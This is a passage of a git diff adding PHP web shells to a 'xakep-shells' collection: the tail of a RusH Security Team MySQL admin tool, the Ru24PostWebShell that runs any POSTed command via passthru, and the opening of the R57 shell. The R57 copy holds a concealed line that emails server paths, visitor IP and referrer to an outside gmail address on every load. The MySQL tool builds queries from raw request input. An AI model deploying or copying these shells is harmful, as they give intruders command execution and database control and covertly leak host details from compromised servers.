+  print "<td bgcolor=#E6E7E9></td><td bgcolor=#E6E7E9></td>";
+  for ($i=0;$i<mysql_num_fields($result);$i++){
+    $name=mysql_field_name($result,$i);
+    print "<td bgcolor=#C7C5C5>$name</td>";   
+  } 
+}
+  while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {
+     print "</tr>";
+
+     foreach ($line as $key =>$col_value) {
+
+         if (count($primary) > 0) { 
+           if (in_array($key,$primary)) { $edit .= urlencode("`$key`='$col_value' AND "); } 
+         } 
+         else {
+            //if (strlen($col_value) >= 20) { 
+            //   $e_count=substr($col_value,0,20);
+            //   $edit .= urlencode("`$key`='$e_count' AND ");
+            //} else {
+               $edit .= urlencode("`$key`='$col_value' AND ");
+            //}
+            
+         } 
+
+        $string .= "<td bgcolor=#EDEEF1>".htmlspecialchars($col_value)."</td>";
+     }
+       $edit=substr_replace($edit,"",-5); //��������� ��������� +AND+
+       print "<tr><td bgcolor=#97C8D4 width=25><a href=$self?query_edit=$edit&s=y&login=$login&passwd=$passwd&server=$server&port=$port&db=$db&tbl=$tbl title=\"������������� �������� �������\">Edit</a></td>".
+             "<td bgcolor=#F84C6C width=25><a href=$self?query_del=$edit&s=y&login=$login&passwd=$passwd&server=$server&port=$port&db=$db&tbl=$tbl title=\"������� ������\" onClick=\"return confirm('������� ������, ������� ?')\";>Del</a></td>".
+             $string."</tr>";
+    
+       unset($edit);
+       unset($string);
+  }
+
+  mysql_free_result($result);
+  print "</table><br>";
+}
+
+//������� ������
+if (isset($query_del)) {
+ $query = 'DELETE FROM '.$tbl.' WHERE '.urldecode($query_del);
+ $r_del = mysql_query($query) or die("$h_error<b>".mysql_error()."</b>$f_error");
+ print "������� ������� ����� (<b> ".mysql_affected_rows()."</b> )";
+
+}
+
+//������� ����� �������������� ������
+if (isset($query_edit)) {
+ $query = 'SELECT * FROM '.$tbl.' WHERE '.urldecode($query_edit);
+ $r_edit = mysql_query($query) or die("$h_error<b>".mysql_error()."</b>$f_error"); 
+
+
+print "<br><center><font color=green><h5>�������������� �������� ����� �������</h5></font></center>".
+      "<table border=0 cellpadding=1 cellspacing=1 bgcolor=#FFFFFF><tr bgcolor=#C7C5C5>".
+      "<td align=center><b>����</b></td><td align=center><b>��������</b></td></tr>";
+print   "<form method=\"get\" action=\"$self\">".
+        "<input type=\"hidden\" name=\"s\" value=\"$s\">".
+        "<input type=\"hidden\" name=\"q_get\" value=\"y\">".
+        "<input type=\"hidden\" name=\"server\" value=\"$server\">".
+        "<input type=\"hidden\" name=\"port\" value=\"$port\">".
+        "<input type=\"hidden\" name=\"login\" value=\"$login\">".
+        "<input type=\"hidden\" name=\"passwd\" value=\"$passwd\">".
+        "<input type=\"hidden\" name=\"db\" value=\"$db\">".
+        "<input type=\"hidden\" name=\"tbl\" value=\"$tbl\">";
+     print "<input type=\"radio\" name=\"up_str\" value=\"up_ok\" checked=\"checked\">�������� ��������&nbsp;&nbsp;<b>���</b>&nbsp;&nbsp;&nbsp;".
+           "<input type=\"radio\" name=\"up_str\" value=\"ins_ok\">�������� ����� ���<br><br>";
+
+  while ($line = mysql_fetch_array($r_edit, MYSQL_ASSOC)) {
+     foreach ($line as $key =>$col_value) {
+        $del_str_� .= "`$key`='$col_value' AND ";
+        $len_value=strlen($col_value);
+        if ($len_value > 40) { $t_value="<textarea name=$key cols=39 rows=5>$col_value</textarea>"; }
+        else { $t_value="<input type='text' name='$key' value='$col_value'size=40>"; }
+        $g_query .= "<tr><td bgcolor=#DBDCDD><b>$key</b></td><td>$t_value</td></tr>";
+     }
+  }
+     $del_str=urlencode($del_str_�);
+     print "<input type=\"hidden\" name=\"del_str\" value=\"$del_str\">";
+     print "$g_query</table><br>";
+     print "<br><input type=submit value=\"�������� ��������\"></form>";
+}
+
+if (isset($q_get)) {
+  $url=$HTTP_SERVER_VARS['QUERY_STRING'];
+  if ($HTTP_GET_VARS['up_str']=='up_ok') {
+     $del_str=urldecode(substr_replace($del_str,"",-5));
+     $b = explode('&', $url);
+     for ($i = 10; $i < count($b); $i++) {
+        $q = explode("=",$b[$i]);
+        $q_a .= "`".$q[0]."`='".$q[1]."', ";
+     }
+     $q_a_ins=urldecode(substr_replace($q_a,"",-2));
+     $q_st=urldecode(substr_replace($q_st,"",-2));
+     //��� �������� $del_str 
+     //�� ��� ����� ������ $q_a_ins
+
+     $up="UPDATE `$tbl` SET $q_a_ins WHERE $del_str LIMIT 1";
+     $q_ins_new = mysql_query($up) or die("$h_error<b>".mysql_error()."</b>$f_error");
+     $c_a_r=mysql_affected_rows();
+     print "<table align=left width=70% bgcolor=#D7D8DA><tr><td><font color=green>".
+           "<b>PHP-��� �������:</b></font></td></tr><tr><td>\$sql=\"$up\";</td>".
+           "</tr><tr><td><font color=green>�������� �����</font> (<b>$c_a_r<b>)</td></tr></table>";
+  }
+  if ($HTTP_GET_VARS['up_str']=='ins_ok') {
+     $b = explode('&', $url);
+     for ($i = 10; $i < count($b); $i++) {
+        $q = explode("=",$b[$i]);
+        $i_cols .="`$q[0]`, ";
+        $i_val .= "'$q[1]', ";
+     }
+     $i_cols=urldecode(substr_replace($i_cols,"",-2)); //�������
+     $q_a_ins=urldecode(substr_replace($i_val,"",-2)); //��������
+     $up="INSERT INTO `$tbl` ($i_cols) VALUES ($q_a_ins)";
+     $q_ins_new = mysql_query($up) or die("$h_error<b>".mysql_error()."</b>$f_error");
+     $c_a_r=mysql_affected_rows();
+     print "<table align=left width=70% bgcolor=#D7D8DA><tr><td><font color=green>".
+           "<b>PHP-��� �������:</b></font></td></tr><tr><td>\$sql=\"$up\";</td>".
+           "</tr><tr><td><font color=green>�������� �����</font> (<b>$c_a_r<b>)</td></tr></table>";
+    
+  }
+}
+
+/*------------�������� ���--------------*/
+if (isset($nn_row) && $HTTP_GET_VARS['nn_row']=='ok') {
+ $nn_q = 'SHOW FIELDS FROM '.$tbl;
+ $r_n = mysql_query($nn_q) or die("$h_error<b>".mysql_error()."</b>$f_error");
+print   "<form method=\"get\" action=\"$self\">".
+        "<input type=\"hidden\" name=\"s\" value=\"$s\">".
+        "<input type=\"hidden\" name=\"nn\" value=\"ok\">".
+        "<input type=\"hidden\" name=\"server\" value=\"$server\">".
+        "<input type=\"hidden\" name=\"port\" value=\"$port\">".
+        "<input type=\"hidden\" name=\"login\" value=\"$login\">".
+        "<input type=\"hidden\" name=\"passwd\" value=\"$passwd\">".
+        "<input type=\"hidden\" name=\"db\" value=\"$db\">".
+        "<input type=\"hidden\" name=\"tbl\" value=\"$tbl\">".
+        "<br><center><font size=2>�������� ����� ��� � ������� [ <b>$tbl</b> ]</font></center>".        
+        "<br><table border=0 cellpadding=0 cellspacing=1 bgcolor=#FFFFFF><tr bgcolor=#DAD9D9>".
+        "<td align=center><b>����</b></td><td align=center><b>���</b></td>".
+        "<td align=center><b>��������</b></td></tr>";
+  while ($n_line = mysql_fetch_array($r_n, MYSQL_ASSOC)) {
+     foreach ($n_line as $n_k =>$n_v) {
+        $pole .= "$n_v ";
+     }
+       $n_l=explode(" ",$pole);
+       print "<tr bgcolor=#EDEEF1><td>&nbsp;<b>$n_l[0]</b>&nbsp;</td><td bgcolor=#E7E7D7>&nbsp;".
+              wordwrap($n_l[1],40,"<br>",1).
+              "&nbsp;</td><td><input type=text name=\"$n_l[0]\" size=35><td></tr>";             
+       unset($pole); 
+  }
+  print "</table><br><center><input type=submit value=\"�������� ����� ���\"></center></form><br>";
+}
+
+if (isset($nn) && $HTTP_GET_VARS['nn']=='ok') {
+     $url_n=urldecode($HTTP_SERVER_VARS['QUERY_STRING']);
+     $b_nn = explode('&', $url_n);
+     for ($i = 8; $i < count($b_nn); $i++) {
+        $q_nn = explode("=",$b_nn[$i]);
+          $q_a_nn .= "`".$q_nn[0]."` ,";        
+          $q_nn_v .= "'".$q_nn[1]."' ,";
+     }
+
+     $q_nn_ins=urldecode(substr_replace($q_a_nn,"",-2));
+     $q_nn_v=substr_replace($q_nn_v,"",-2);
+     $sql_n="INSERT INTO `$tbl` ( $q_nn_ins ) VALUES ( $q_nn_v )";
+     mysql_query($sql_n) or die("$h_error<b>".mysql_error()."</b>$f_error");
+     $c_n_r=mysql_affected_rows();
+     print "&nbsp;&nbsp;&nbsp;<table align=left width=70% bgcolor=#D7D8DA>".
+           "<tr><td><b>Action:</b> <font color=green>������� ��������� �����</font> (<b>$c_n_r<b>)</td></tr>".
+           "<tr><td><font color=green><b>PHP-��� �������:</b></font></td></tr><tr><td>\$sql=\"$sql_n\";</td></tr></table><br><br>";
+}
+
+/*-----------dump �������------------*/
+$form_dump=
+"<form method=\"get\" action=\"$self\">".
+"<input type=\"hidden\" name=\"s\" value=\"$s\">".
+"<input type=\"hidden\" name=\"db\" value=\"$db\">".
+"<input type=\"hidden\" name=\"tbl\" value=\"$tbl\">".
+"<input type=\"hidden\" name=\"server\" value=\"$server\">".
+"<input type=\"hidden\" name=\"port\" value=\"$port\">".
+"<input type=\"hidden\" name=\"login\" value=\"$login\">".
+"<input type=\"hidden\" name=\"passwd\" value=\"$passwd\">".
+"<input type=\"hidden\" name=\"f_dump\" value=\"$file\">".
+"<table bgcolor=#FFFFFF width=400 cellpadding=0 cellspacing=1 border=0><tr bgcolor=#F0F1F4><td valign=top>".
+"<table cellpadding=2 bgcolor=#F0F1F4 width=100%>".
+"<tr><td align=center><b>Dump �������</b> [ <font color=green><b>$tbl</b></font> ]</td></tr>".
+"<tr><td><input type=\"radio\" name=\"strukt\" value=\"t_strukt\"> ������ ���������</td></tr>".
+"<tr><td><input type=\"radio\" name=\"strukt\" value=\"d\"> ������ ������</td></tr>".
+"<tr><td><input type=\"radio\" name=\"strukt\" value=\"d_strukt\" checked=\"checked\"> ��������� � ������</td></tr>".
+"<tr><td align=center><hr size=1 color=#FFFFFF><b>��������</b> (��������/���������)</td></tr>".
+"<tr><td><input type=\"radio\" name=\"send\" value=\"send_br\" checked=\"checked\"> �������� � ��������</td></tr>".
+"<tr><td><input type=\"radio\" name=\"send\" value=\"send_http\"> ��������� ���� ����� �� HTTP</td></tr>".
+"<tr><td align=center><br><input type=\"submit\" value=\"��������� ������\"></td></tr>".
+"</table>".
+"</td></tr></table></form>";
+
+if ($dump=="tab"){ print $form_dump;}
+/*----------������ ���������------------*/
+
+if ($HTTP_GET_VARS['strukt']=='t_strukt' && $HTTP_GET_VARS['send']=='send_br' ){
+   $host = $HTTP_SERVER_VARS["SERVER_NAME"];
+   $ip = $HTTP_SERVER_VARS["SERVER_ADDR"];
+
+   mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   //$file = "/tmp/dump_".$tbl.".sql";
+   // ��������� ���� ��� ������ ����� 
+   $fp = fopen($file, "w"); 
+   fputs ($fp, "# RST MySQL tools\r\n# Home page: http://rst.void.ru\r\n#\n# Host settings:\n# $host ($ip)\n# MySQL version: (".mysql_get_server_info().")\n# Date: ".
+   date("F j, Y, g:i a")."\n# "." dump db \"".$db."\" table \"".$tbl."\"\n#_________________________________________________________\n\n"); 
+
+      // �������� ����� ������� �������� ��������� ������� 
+      $res = mysql_query("SHOW CREATE TABLE `".$tbl."`", $connection) or die("$h_error<b>".mysql_error()."</b>$f_error"); 
+      $row = mysql_fetch_row($res); 
+      fputs($fp, "DROP TABLE IF EXISTS `".$tbl."`;\n");
+      fputs($fp, $row[1].";\n\n");   
+   fclose($fp); 
+   $dump_file=file($file);
+print "<br><table bgcolor=#FFFFFF width=99% cellpadding=0 cellspacing=1 border=1><tr><td><table width=100% cellpadding=2 bgcolor=#F0F1F4>";
+foreach ($dump_file as $k=>$v){$v=str_replace("\n","<br>",$v);print "<tr><td>".strip_tags($v,"<br>")."</td></tr>";}
+print "</table></td></tr></table><br>";
+
+unlink($file);
+}
+
+/*----------��������� � ������------------*/
+if ($HTTP_GET_VARS['strukt']=='d_strukt' && $HTTP_GET_VARS['send']=='send_br'){
+   $host = $HTTP_SERVER_VARS["SERVER_NAME"];
+   $ip = $HTTP_SERVER_VARS["SERVER_ADDR"];
+
+   mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   //$file = "/tmp/dump_".$tbl.".sql";
+   // ��������� ���� ��� ������ ����� 
+   $fp = fopen($file, "w"); 
+   fputs ($fp, "# RST MySQL tools\r\n# Home page: http://rst.void.ru\r\n#\n# Host settings:\n# $host ($ip)\n # MySQL version: (".mysql_get_server_info().")\n# Date: ".
+   date("F j, Y, g:i a")."\n# "." dump db \"".$db."\" table \"".$tbl."\"\n#_________________________________________________________\n\n"); 
+
+      // �������� ����� ������� �������� ��������� ������� 
+      $res = mysql_query("SHOW CREATE TABLE `".$tbl."`", $connection) or die("$h_error<b>".mysql_error()."</b>$f_error"); 
+      $row = mysql_fetch_row($res); 
+      fputs($fp, "DROP TABLE IF EXISTS `".$tbl."`;\n");
+      fputs($fp, $row[1].";\n\n"); 
+       
+      // �������� ������ ������� 
+      $res = mysql_query("SELECT * FROM `$tbl`", $connection); 
+      if (mysql_num_rows($res) > 0) { 
+         while ($row = mysql_fetch_assoc($res)) { 
+            $keys = implode("`, `", array_keys($row)); 
+            $values = array_values($row); 
+            foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+            $values = implode("', '", $values); 
+            $sql = "INSERT INTO `$tbl`(`".$keys."`) VALUES ('".$values."');\n"; 
+            fputs($fp, $sql); 
+         } 
+      }
+ 
+   fclose($fp); 
+$dump_file=file($file);
+print "<br><table bgcolor=#FFFFFF width=99% cellpadding=0 cellspacing=1 border=1><tr><td><table width=100% cellpadding=2 bgcolor=#F0F1F4>";
+foreach ($dump_file as $k=>$v){$v=str_replace("\n","<br>",$v);print "<tr><td>".strip_tags($v,"<br>")."</td></tr>";}
+print "</table></td></tr></table><br>";
+unlink($file);
+}
+
+/*----------������ ������------------*/
+if ($HTTP_GET_VARS['strukt']=='d' && $HTTP_GET_VARS['send']=='send_br'){
+   $host = $HTTP_SERVER_VARS["SERVER_NAME"];
+   $ip = $HTTP_SERVER_VARS["SERVER_ADDR"];
+
+   mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   //$file = "/tmp/dump_".$tbl.".sql";
+   // ��������� ���� ��� ������ ����� 
+   $fp = fopen($file, "w"); 
+      // �������� ������ ������� 
+      $res = mysql_query("SELECT * FROM `$tbl`", $connection); 
+      if (mysql_num_rows($res) > 0) { 
+         while ($row = mysql_fetch_assoc($res)) { 
+            $keys = implode("`, `", array_keys($row)); 
+            $values = array_values($row); 
+            foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+            $values = implode("', '", $values); 
+            $sql = "INSERT INTO `$tbl`(`".$keys."`) VALUES ('".$values."');\n"; 
+            fputs($fp, $sql); 
+         } 
+      }
+ 
+   fclose($fp); 
+$dump_file=file($file);
+print "<br><table bgcolor=#FFFFFF width=99% cellpadding=0 cellspacing=1 border=1><tr><td><table width=100% cellpadding=2 bgcolor=#F0F1F4>";
+foreach ($dump_file as $k=>$v){$v=str_replace("\n","<br>",$v);print "<tr><td>".strip_tags($v,"<br>")."</td></tr>";}
+print "</table></td></tr></table><br>";
+unlink($file);
+}
+/*-------------END! �������� ������ �������--------------*/
+
+print "
+   </td>
+ </tr>
+</table>
+           </td>
+         </tr>
+       </table>";
+}
+
+/*------------------------ END R I G H T   B L O C K ! -----------------------*/
+/*���������� php*/
+if (isset($php) && $php=='ok'){
+phpinfo();
+}
+if (isset($q_help) && $q_help=='ok'){
+ print '���� HELP �� ��������
+ <li><b>SHOW TABLES </b> ������� ������ ������ ����
+ <li><b>SHOW OPEN TABLES</b> ������� ������ ������, ������� � ��������� ������ ������� � ���� �������
+ <li><b>SHOW TABLE STATUS</b> ��������� ������ ����
+ <li><b>SELECT VERSION(), CURRENT_DATE</b> ������� ������ MySQL ������� � ������� ����
+ <li><b>SELECT (2*2), (4+1)*5, (9/3), (5-3)</b> ���������� MySQL ��� �����������: ��������� ����� ������� �������������� ��������
+ <li><b>DROP TABLE IF EXISTS table_name</b> ������� ������� \"table_name\"
+ <li><b>CREATE TABLE bar (m INT)</b> ������� ������� bar � ����� �������� (m) ���� integer
+ <li><b>CREATE TABLE test (number INTEGER,texts CHAR(10));</b> ������� ������� test � ������ number -��� INTEGER � ���� texts -��� CHAR
+ <li><b>CREATE TABLE `test` SELECT * FROM `rush`;</b> ������� ������� test ,������� ������� rush
+ <li><b>ALTER TABLE test CHANGE SITE OLD_SITE INTEGER</b> ������������� ������� INTEGER �� SITE � OLD_SITE
+ <li><b>ALTER TABLE test RENAME rush</b> ������������� ������� test � rush
+ <li><b>UPDATE mysql.user SET Password=PASSWORD(\'new_passwd\') WHERE user=\'root\'</b> ������� ����� root ������
+ <li><b>FLUSH PRIVILEGES</b> ���������� ������� ���������� ������
+ <li><b>GRANT ALL PRIVILEGES ON *.* TO rst@localhost IDENTIFIED BY \'some_pass\' WITH GRANT OPTION</b> �������� ������ �����-����� mysql <b>rst</b> � ������� <b>some_pass</b>
+ ';
+
+}
+
+print "
+   </td>
+ </tr>
+</table>
+
+</td></tr>
+<tr><td>
+<table align=center width=100% cellpadding=0 cellspacing=1 bgcolor=#000000>
+<tr><td>
+      <table background=".$self."?img=bg_f align=center border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#C2C2C2>
+         <tr>
+            <td align=center>
+                free script &copy;RusH Security Team 
+            </td>
+         </tr>
+      </table> 
+</td></tr>
+</table>
+</td></tr></table>";
+
+?>
diff --git a/xakep-shells/PHP/ru24_post_sh.php.php.txt b/xakep-shells/PHP/ru24_post_sh.php.php.txt
new file mode 100644
index 0000000..5600c64
--- /dev/null
+++ b/xakep-shells/PHP/ru24_post_sh.php.php.txt
@@ -0,0 +1,23 @@
+<?php
+/*
+Ru24PostWebShell
+Writed by DreAmeRz
+
+http://www.ru24-team.net
+*/
+error_reporting(0);
+$function=passthru; // system, exec, cmd
+echo "<html>
+<head>
+<title>Ru24PostWebShell - ".$_POST['cmd']."</title>
+<meta http-equiv='pragma' content='no-cache'>
+</head><body>";
+echo "<form method=post>";
+echo "<input type=text name=cmd size=85>";
+echo "</form>";
+echo "<pre>";
+if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a;ls -la"; }
+echo "".$function($_POST['cmd'])."</pre></body></html>";
+
+
+?>
diff --git a/xakep-shells/PHP/s.php.php.txt b/xakep-shells/PHP/s.php.php.txt
new file mode 100644
index 0000000..f6abddc
--- /dev/null
+++ b/xakep-shells/PHP/s.php.php.txt
@@ -0,0 +1,1887 @@
+<?php
+/******************************************************************************************************/
+/*  
+/*    R57 shell
+/* 
+/*    
+/*     
+/*
+/* 
+/*  r57shell.php - &#1089;&#1082;&#1088;&#1080;&#1087;&#1090; &#1085;&#1072; &#1087;&#1093;&#1087; &#1087;&#1086;&#1079;&#1074;&#1086;&#1083;&#1103;&#1102;&#1097;&#1080;&#1081; &#1074;&#1072;&#1084; &#1074;&#1099;&#1087;&#1086;&#1083;&#1085;&#1103;&#1090;&#1100; &#1096;&#1077;&#1083;&#1083; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1099;  &#1085;&#1072; &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;&#1077; &#1095;&#1077;&#1088;&#1077;&#1079; &#1073;&#1088;&#1072;&#1091;&#1079;&#1077;&#1088;
+/*  &#1042;&#1077;&#1088;&#1089;&#1080;&#1103;: 1.23
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+/******************************************************************************************************/
+
+/* ~~~ &#1053;&#1072;&#1089;&#1090;&#1088;&#1086;&#1081;&#1082;&#1080;  ~~~ */
+error_reporting(0);
+set_magic_quotes_runtime(0);
+@set_time_limit(0);
+@ini_set('max_execution_time',0);
+@ini_set('output_buffering',0);
+$safe_mode = @ini_get('safe_mode');
+$version = "R57  
+| pang0 |";
+
+if(version_compare(phpversion(), '4.1.0') == -1)
+ {
+ $_POST   = &$HTTP_POST_VARS;
+ $_GET    = &$HTTP_GET_VARS;
+ $_SERVER = &$HTTP_SERVER_VARS;
+ }
+if (@get_magic_quotes_gpc())
+ {
+ foreach ($_POST as $k=>$v)
+  {
+  $_POST[$k] = stripslashes($v);
+  }
+ foreach ($_SERVER as $k=>$v)
+  {
+  $_SERVER[$k] = stripslashes($v);
+  }
+ }
+$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+/* ~~~ &#1040;&#1091;&#1090;&#1077;&#1085;&#1090;&#1080;&#1092;&#1080;&#1082;&#1072;&#1094;&#1080;&#1103; ~~~ */
+
+// $auth = 1; - &#1040;&#1091;&#1090;&#1077;&#1085;&#1090;&#1080;&#1092;&#1080;&#1082;&#1072;&#1094;&#1080;&#1103; &#1074;&#1082;&#1083;&#1102;&#1095;&#1077;&#1085;&#1072;
+// $auth = 0; - &#1040;&#1091;&#1090;&#1077;&#1085;&#1090;&#1080;&#1092;&#1080;&#1082;&#1072;&#1094;&#1080;&#1103; &#1074;&#1099;&#1082;&#1083;&#1102;&#1095;&#1077;&#1085;&#1072;
+$auth = 0;
+
+// &#1051;&#1086;&#1075;&#1080;&#1085; &#1080; &#1087;&#1072;&#1088;&#1086;&#1083;&#1100; &#1076;&#1083;&#1103; &#1076;&#1086;&#1089;&#1090;&#1091;&#1087;&#1072; &#1082; &#1089;&#1082;&#1088;&#1080;&#1087;&#1090;&#1091;
+// &#1053;&#1045; &#1047;&#1040;&#1041;&#1059;&#1044;&#1068;&#1058;&#1045; &#1057;&#1052;&#1045;&#1053;&#1048;&#1058;&#1068; &#1055;&#1045;&#1056;&#1045;&#1044; &#1056;&#1040;&#1047;&#1052;&#1045;&#1065;&#1045;&#1053;&#1048;&#1045;&#1052; &#1053;&#1040; &#1057;&#1045;&#1056;&#1042;&#1045;&#1056;&#1045;!!!
+$name='Root'; // &#1083;&#1086;&#1075;&#1080;&#1085; &#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1077;&#1083;&#1103;
+$pass='pass'; // &#1087;&#1072;&#1088;&#1086;&#1083;&#1100; &#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1077;&#1083;&#1103;
+
+if($auth == 1) {
+if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_SERVER['PHP_AUTH_PW']!==$pass)
+   {
+   header('WWW-Authenticate: Basic realm="shell"');
+   header('HTTP/1.0 401 Unauthorized');
+   exit(" : Access Denied</b>");
+   }
+}
+$head = '<!-- &#1047;&#1076;&#1088;&#1072;&#1074;&#1089;&#1090;&#1074;&#1091;&#1081;  &#1042;&#1072;&#1089;&#1103; -->
+<html>
+<head>
+<title>pang0</title>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+
+<STYLE>
+tr {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+td {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+.table1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP:    #cccccc 0px;
+BORDER-LEFT:   #cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+BACKGROUND-COLOR blue;
+}
+.td1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP:    #cccccc 0px;
+BORDER-LEFT:   #cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+font: 7pt Verdana;
+}
+.tr1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP:    #cccccc 0px;
+BORDER-LEFT:   #cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+}
+table {
+BORDER-RIGHT:  #eeeeee 1px outset;
+BORDER-TOP:    #eeeeee 1px outset;
+BORDER-LEFT:   #eeeeee 1px outset;
+BORDER-BOTTOM: #eeeeee 1px outset;
+BACKGROUND-COLOR: #D4D0C8;
+}
+input {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #D4D0C8;
+font: 8pt Verdana;
+}
+select {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+submit {
+BORDER-RIGHT:  buttonhighlight 2px outset;
+BORDER-TOP:    buttonhighlight 2px outset;
+BORDER-LEFT:   buttonhighlight 2px outset;
+BORDER-BOTTOM: buttonhighlight 2px outset;
+BACKGROUND-COLOR: #e4e0d8;
+width: 30%;
+}
+textarea {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #D4D0C8;
+font: Fixedsys bold;
+}
+BODY {
+margin-top: 1px;
+margin-right: 1px;
+margin-bottom: 1px;
+margin-left: 1px;
+}
+A:link {COLOR:blue; TEXT-DECORATION: none}
+A:visited { COLOR:blue; TEXT-DECORATION: none}
+A:active {COLOR:blue; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+</STYLE>';
+if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">GERI</a> ]</b></font></div>"; die(); }
+if ($_POST['cmd']=="db_query")
+ {
+  echo $head;
+  switch($_POST['db'])
+  {
+  case 'MySQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
+  $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+   	if(!empty($_POST['mysql_db'])) { @mysql_select_db($_POST['mysql_db'],$db); }
+    $querys = @explode(';',$_POST['db_query']);
+    foreach($querys as $num=>$query)
+     {
+      if(strlen($query)>5){
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+      $res = @mysql_query($query,$db);
+      $error = @mysql_error($db);
+      if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }
+      else {
+      if (@mysql_num_rows($res) > 0)
+       {
+       $sql2 = $sql = $keys = $values = '';
+       while (($row = @mysql_fetch_assoc($res)))
+        {
+        $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
+        $values = @array_values($row);
+        foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
+        $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
+        $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
+        }
+       echo "<table width=100%>";
+       $sql  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+       $sql .= $sql2;
+       echo $sql;
+       echo "</table><br>";
+       }
+      else { if(($rows = @mysql_affected_rows($db))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } }
+      }
+      @mysql_free_result($res);
+      }
+     }
+   	@mysql_close($db);
+   }
+  else echo "<div align=center><font face=Verdana size=-2 color=red><b>MsSQL Server ile baglanti kurulamadi</b></font></div>";
+  break;
+  case 'MSSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
+  $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+   	if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); }
+    $querys = @explode(';',$_POST['db_query']);
+    foreach($querys as $num=>$query)
+     {
+      if(strlen($query)>5){
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+      $res = @mssql_query($query,$db);
+      if (@mssql_num_rows($res) > 0)
+       {
+       $sql2 = $sql = $keys = $values = '';
+       while (($row = @mssql_fetch_assoc($res)))
+        {
+        $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
+        $values = @array_values($row);
+        foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
+        $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
+        $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
+        }
+       echo "<table width=100%>";
